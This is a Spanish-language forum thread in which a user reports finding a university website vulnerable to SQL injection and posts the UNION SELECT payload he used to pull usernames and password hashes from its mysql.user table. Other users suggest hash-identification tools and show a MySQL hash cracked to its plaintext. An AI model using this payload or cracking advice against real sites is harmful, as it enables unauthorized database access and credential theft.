¿Porque no se descifra este hash?

Iniciado por TheFerret, 1 Septiembre 2015, 12:41 PM

0 Miembros y 1 Visitante están viendo este tema.

TheFerret

Haciendo Google Dorks me encontré esta web de una Universidad vulnerable a SQL INJECTION.
He intentado descifrar los hashes que aparecen pero no lo consigo! No es MD5 o SHA1?

http://www.xxx./xxx/noticias.php?id=1947+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2+FROM+mysql.user--

Mod: No poner enlaces a paginas vulnerables directamente.


el-brujo

puede ser un hash cifrado, pero seguramente es un hash cifrado con un salt.

Mira con:

Si desconoces el  tipo de Hash que posees, tienes la opción de poder utilizar un Script que te permite resolver el problema. La herramienta (script) escrita en Python es Hash ID ( Hash Identifier)

https://code.google.com/p/hash-identifier/

Versión actualizada de Hash ID:

    https://github.com/psypanda/hashID

Shell Root

Se supone que el hash que estas sacando es el de MySQL, por ej:

Este hash estoy seguro de que es de MySQL, el hash es el siguiente:
*90E462C37378CED12064BB3388827D2BA3A9B689

Cuando trato de crackearlo con las paginas online, me sale lo siguiente:
90e462c37378ced12064bb3388827d2ba3a9b689 MySQL4.1/MySQL5 : biscuit
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.